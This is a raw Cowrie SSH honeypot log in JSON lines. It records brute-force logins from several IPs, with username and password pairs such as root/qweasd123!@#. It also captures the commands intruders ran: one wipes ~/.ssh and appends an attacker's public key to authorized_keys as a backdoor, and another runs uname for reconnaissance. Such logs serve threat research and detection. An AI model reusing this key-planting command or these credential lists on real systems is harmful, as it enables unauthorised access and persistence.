{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:15:46.162329Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.login.success","username":"root","password":"qweasd123!@#","message":"login attempt [root/qweasd123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:15:46.980118Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:15:47.390731Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:15:47.391424Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:15:47.392412Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:15:47.588261Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:15:48.081837Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T11:15:48.082634Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T11:15:48.279315Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:15:48.280271Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.session.connect","src_ip":"168.167.228.123","src_port":28249,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ebbe1e37a63","protocol":"ssh","message":"New connection: 168.167.228.123:28249 (1.2.3.4:22) [session: 1ebbe1e37a63]","sensor":"my-vps","timestamp":"2025-08-26T11:15:48.473206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:15:48.473949Z","src_ip":"168.167.228.123","session":"1ebbe1e37a63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:15:48.668566Z","src_ip":"168.167.228.123","session":"1ebbe1e37a63"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T11:15:49.486791Z","src_ip":"168.167.228.123","session":"1ebbe1e37a63"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:15:50.683228Z","src_ip":"168.167.228.123","session":"1ebbe1e37a63"}
{"eventid":"cowrie.session.connect","src_ip":"168.167.228.123","src_port":28250,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4b3b4d969d6","protocol":"ssh","message":"New connection: 168.167.228.123:28250 (1.2.3.4:22) [session: d4b3b4d969d6]","sensor":"my-vps","timestamp":"2025-08-26T11:15:50.876917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:15:50.877557Z","src_ip":"168.167.228.123","session":"d4b3b4d969d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:15:51.072168Z","src_ip":"168.167.228.123","session":"d4b3b4d969d6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:15:51.892426Z","src_ip":"168.167.228.123","session":"d4b3b4d969d6"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:15:52.088934Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:15:52.089835Z","src_ip":"168.167.228.123","session":"d4b3b4d969d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40956,"dst_ip":"1.2.3.4","dst_port":22,"session":"086f6ae1d9e0","protocol":"ssh","message":"New connection: 212.227.125.160:40956 (1.2.3.4:22) [session: 086f6ae1d9e0]","sensor":"my-vps","timestamp":"2025-08-26T11:16:01.455571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:16:01.456311Z","src_ip":"212.227.125.160","session":"086f6ae1d9e0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T11:16:01.506578Z","src_ip":"212.227.125.160","session":"086f6ae1d9e0"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:16:09.457349Z","src_ip":"212.227.125.160","session":"086f6ae1d9e0"}
{"eventid":"cowrie.session.connect","src_ip":"88.5.99.91","src_port":36855,"dst_ip":"1.2.3.4","dst_port":23,"session":"9c2567b654fe","protocol":"telnet","message":"New connection: 88.5.99.91:36855 (1.2.3.4:23) [session: 9c2567b654fe]","sensor":"my-vps","timestamp":"2025-08-26T11:16:09.983172Z"}
{"eventid":"cowrie.session.closed","duration":14.219406604766846,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:16:24.202499Z","src_ip":"88.5.99.91","session":"9c2567b654fe"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":60276,"dst_ip":"1.2.3.4","dst_port":22,"session":"c45f8aa1a9c6","protocol":"ssh","message":"New connection: 196.251.86.249:60276 (1.2.3.4:22) [session: c45f8aa1a9c6]","sensor":"my-vps","timestamp":"2025-08-26T11:16:32.292129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:16:32.767756Z","src_ip":"196.251.86.249","session":"c45f8aa1a9c6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:16:32.768530Z","src_ip":"196.251.86.249","session":"c45f8aa1a9c6"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"password","message":"login attempt [hadoop/password] failed","sensor":"my-vps","timestamp":"2025-08-26T11:16:34.676777Z","src_ip":"196.251.86.249","session":"c45f8aa1a9c6"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:16:36.097660Z","src_ip":"196.251.86.249","session":"c45f8aa1a9c6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54528,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fdf90465aca","protocol":"ssh","message":"New connection: 83.168.105.65:54528 (1.2.3.4:22) [session: 2fdf90465aca]","sensor":"my-vps","timestamp":"2025-08-26T11:17:20.567518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:17:20.568655Z","src_ip":"83.168.105.65","session":"2fdf90465aca"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T11:17:20.608866Z","src_ip":"83.168.105.65","session":"2fdf90465aca"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:17:28.567832Z","src_ip":"83.168.105.65","session":"2fdf90465aca"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":60146,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fcc09c33619","protocol":"ssh","message":"New connection: 196.251.86.249:60146 (1.2.3.4:22) [session: 3fcc09c33619]","sensor":"my-vps","timestamp":"2025-08-26T11:17:34.464381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:17:35.108780Z","src_ip":"196.251.86.249","session":"3fcc09c33619"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:17:35.109955Z","src_ip":"196.251.86.249","session":"3fcc09c33619"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"passwd","message":"login attempt [hadoop/passwd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:17:37.409783Z","src_ip":"196.251.86.249","session":"3fcc09c33619"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:17:38.964669Z","src_ip":"196.251.86.249","session":"3fcc09c33619"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49578,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd9b78458df1","protocol":"ssh","message":"New connection: 212.227.125.160:49578 (1.2.3.4:22) [session: dd9b78458df1]","sensor":"my-vps","timestamp":"2025-08-26T11:17:59.651822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:17:59.746458Z","src_ip":"212.227.125.160","session":"dd9b78458df1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:17:59.747214Z","src_ip":"212.227.125.160","session":"dd9b78458df1"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:18:00.655451Z","src_ip":"212.227.125.160","session":"dd9b78458df1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:18:00.920208Z","src_ip":"212.227.125.160","session":"dd9b78458df1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:18:00.921114Z","src_ip":"212.227.125.160","session":"dd9b78458df1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:00.974898Z","src_ip":"212.227.125.160","session":"dd9b78458df1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:00.976168Z","src_ip":"212.227.125.160","session":"dd9b78458df1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50362,"dst_ip":"1.2.3.4","dst_port":22,"session":"b553dd66ab38","protocol":"ssh","message":"New connection: 212.227.125.160:50362 (1.2.3.4:22) [session: b553dd66ab38]","sensor":"my-vps","timestamp":"2025-08-26T11:18:06.595800Z"}
